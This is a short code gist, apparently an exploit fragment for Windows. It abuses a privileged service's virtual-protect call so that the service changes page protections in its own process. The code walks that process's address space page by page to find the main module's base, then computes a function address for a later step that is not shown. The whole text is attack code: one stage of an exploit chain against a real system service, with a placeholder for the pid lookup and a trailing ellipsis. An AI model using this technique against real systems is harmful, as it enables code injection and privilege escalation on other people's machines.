@SouhailHammou
Last active February 6, 2019 00:37
pid = /* Locate the service's pid with the help of NtQuerySystemInformation */;

/* Walk the service's user-mode address space one page at a time. */
for ( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
    Page_cp = Page;
    OldProtection = CommunicateServiceVirtualProtect(
        pid,                    // We give the service its own pid
        Page,                   // Address of the page in the service's process
        PAGE_EXECUTE_READWRITE, // Change to the most permissive protection to avoid crashes
        0x1000
    );

    if ( OldProtection == -1 ) // Invalid (unmapped) page: nothing to restore
        continue;

    if ( OldProtection == PAGE_EXECUTE_READ )
    {
        // This is the main module's .text section; the PE header sits one page below it
        Base = Page - 0x1000;
        Page = 0x7fffefff; // To break out of the loop after restoring the old protection
    }

    // Restore the old protection on the page we actually changed (Page_cp)
    CommunicateServiceVirtualProtect(
        pid,
        Page_cp,
        OldProtection,
        0x1000
    );
}

// Use the base to calculate the function address
pFunc = Base + FuncOffset;
// ....